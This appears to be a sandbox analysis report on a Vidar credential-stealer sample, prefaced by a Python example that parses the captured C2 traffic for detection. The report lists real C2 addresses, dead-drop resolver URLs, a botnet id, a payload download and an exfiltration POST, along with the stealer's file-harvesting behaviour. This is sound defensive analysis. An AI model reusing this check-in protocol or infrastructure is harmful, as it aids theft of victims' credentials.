Source: 06625899.exe, 00000000.00000002.412477321.000000000082A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
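
The traffic in this section shows the Vidar check-in sequence in order: a fetch of the Telegram page named in the configuration (a dead-drop resolver, the public page only hosts the real C2 address), a GET to 188.34.154.187:30303 whose path is the configured Botnet value, a download of addon.zip, and a multipart/form-data POST back to the same endpoint. The Python below is an added example written for this page (not report output and not Joe Sandbox tooling) that turns the run-together request lines exactly as the report prints them into structured events and tags the pattern a detection engineer would key on: HTTP on a non-standard port, a path equal to the botnet id, a .zip download, a multipart upload, and a User-Agent claiming a non-Windows platform on a Windows host. The tag names and the STANDARD_HTTP_PORTS set are this example's own choices, not anything from the report.

```python
import re
from urllib.parse import urlsplit

# Constructed input: verbatim copies of the run-together HTTP request lines
# printed in the Networking section of this report (the extractor joined
# the headers onto one line, so the parser has to split them apart again).
REPORT_LINES = [
    "GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) "
    "Gecko / 20100101 Firefox / 107.0Host: t.me",
    "GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303",
    "GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303"
    "Cache-Control: no-cache",
    "POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024"
    "User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185"
    "Connection: Keep-AliveCache-Control: no-cache",
]

# The configuration the report's extractor recovered from process memory.
CONFIG = {
    "C2 url": ["https://steamcommunity.com/profiles/76561199508624021",
               "https://t.me/looking_glassbot"],
    "Botnet": "667e85c8112da056f901292caf82b3ed",
}

HOST_OS = "Windows"                      # the analysis machine (report title)
STANDARD_HTTP_PORTS = {80, 443, 8080}    # assumption: what "standard" means here
HEADER_NAMES = ("User-Agent", "Host", "Content-Type", "Content-Length",
                "Connection", "Cache-Control")
# Zero-width split in front of every known header name.
_HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
_REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]$")


def parse_request(line):
    """Split one run-together request into method, path and a header dict."""
    chunks = _HEADER_SPLIT.split(line)
    m = _REQUEST_LINE.match(chunks[0])
    if not m:
        raise ValueError("no request line in %r" % chunks[0])
    headers = {}
    for chunk in chunks[1:]:
        name, _, value = chunk.partition(": ")
        headers[name.lower()] = value
    return {"method": m.group(1), "path": m.group(2), "headers": headers}


def split_host(host_header):
    """'188.34.154.187:30303' -> ('188.34.154.187', 30303); no port -> None."""
    host, sep, port = host_header.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return host_header, None


def classify(request, config):
    """Tag one request with its role in the stealer's check-in sequence."""
    host, port = split_host(request["headers"].get("host", ""))
    resolver_hosts = {urlsplit(u).hostname for u in config["C2 url"]}
    ua = request["headers"].get("user-agent", "")
    tags = set()
    if host in resolver_hosts:
        tags.add("dead_drop_resolver")        # public page that hides the real C2
    if port is not None and port not in STANDARD_HTTP_PORTS:
        tags.add("http_nonstandard_port")
    if request["path"].strip("/") == config["Botnet"]:
        tags.add("botnet_id_beacon")          # first check-in carries the botnet id
    if request["path"].lower().endswith(".zip"):
        tags.add("payload_download")
    ctype = request["headers"].get("content-type", "")
    if request["method"] == "POST" and ctype.startswith("multipart/form-data"):
        tags.add("multipart_upload")          # the exfil POST in this report
    if HOST_OS not in ua:
        tags.add("ua_platform_mismatch")      # a ChromeOS UA from a Windows host
    return {"method": request["method"], "host": host, "port": port,
            "path": request["path"], "tags": tags,
            "content_length": int(request["headers"].get("content-length", 0))}


def analyse(lines, config=CONFIG):
    return [classify(parse_request(line), config) for line in lines]


def c2_endpoints(events):
    """Endpoints actually contacted, minus the dead-drop resolver pages."""
    return {(e["host"], e["port"]) for e in events
            if "dead_drop_resolver" not in e["tags"]}


if __name__ == "__main__":
    events = analyse(REPORT_LINES)
    for e in events:
        print(e["method"], e["host"], e["port"], e["path"], sorted(e["tags"]))
    print("C2:", c2_endpoints(events))
```

The resolver hosts (steamcommunity.com, t.me) are deliberately excluded from the C2 set: blocking them is not a useful control, whereas the IP:port pair the page actually resolves to, plus the botnet id used as a URL path, are the indicators worth alerting on. The second hard-coded address in memory, 23.88.46.113:80, never appears in the captured requests, so it is not in this example's input.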

System Summary

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 06625899.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00428C70 0_2_00428C70
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043C00E 0_2_0043C00E
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004051A0 0_2_004051A0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042B366 0_2_0042B366
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042A379 0_2_0042A379
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043C55F 0_2_0043C55F
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042A80E 0_2_0042A80E
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00426810 0_2_00426810
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00426838 0_2_00426838
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043BABD 0_2_0043BABD
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042ABAC 0_2_0042ABAC
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00405C40 0_2_00405C40
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00405C68 0_2_00405C68
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043DC7F 0_2_0043DC7F
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00407C20 0_2_00407C20
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0043CC3B 0_2_0043CC3B
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00407C9E 0_2_00407C9E
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042CDD0 0_2_0042CDD0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00406E10 0_2_00406E10
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00426EB0 0_2_00426EB0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042AF7E 0_2_0042AF7E
Source: C:\Users\user\Desktop\06625899.exe Code function: String function: 0042BD10 appears 116 times
Source: C:\Users\user\Desktop\06625899.exe Code function: String function: 004014E0 appears 540 times
Source: C:\Users\user\Desktop\06625899.exe Code function: String function: 00433750 appears 44 times
Source: 06625899.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\06625899.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\06625899.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/4@1/3
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 0_2_0041F170
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 36067264576515806059430256.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041F040 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle, 0_2_0041F040
Source: C:\Users\user\Desktop\06625899.exe Command line argument: The 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Greal 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: (Llangollen) 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: was 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: 19th-century 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Welsh-language 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: periodical 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: first 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: published 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: William 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Williams 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Llangollen 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: 1852 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Ebenezer 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: was 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Independent 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: chapel 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Inkerman 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Street 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Llanelli 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Carmarthenshire 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Wales 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Strigamia 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: crassipes 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: centipede 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: belonging 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: the 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: family 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Linotaeniidae 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: the 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: order 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe Command line argument: Geophilomorpha 0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 06625899.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source: Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Data Obfuscation

Source: C:\Users\user\Desktop\06625899.exe Unpacked PE file: 0.2.06625899.exe.400000.0.unpack
Source: C:\Users\user\Desktop\06625899.exe Unpacked PE file: 0.2.06625899.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042C254 pushad ; retn 0042h 0_2_0042C255
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00433795 push ecx; ret 0_2_004337A8
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0042ECB5 push ecx; ret 0_2_0042ECC8
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00424430
Source: initial sample Static PE information: section name: .text entropy: 7.818078308305934

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00424430
Source: C:\Users\user\Desktop\06625899.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\06625899.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004011A0 GetSystemInfo, 0_2_004011A0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW, 0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset, 0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset, 0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00409F60
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 0_2_0040D1C0
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
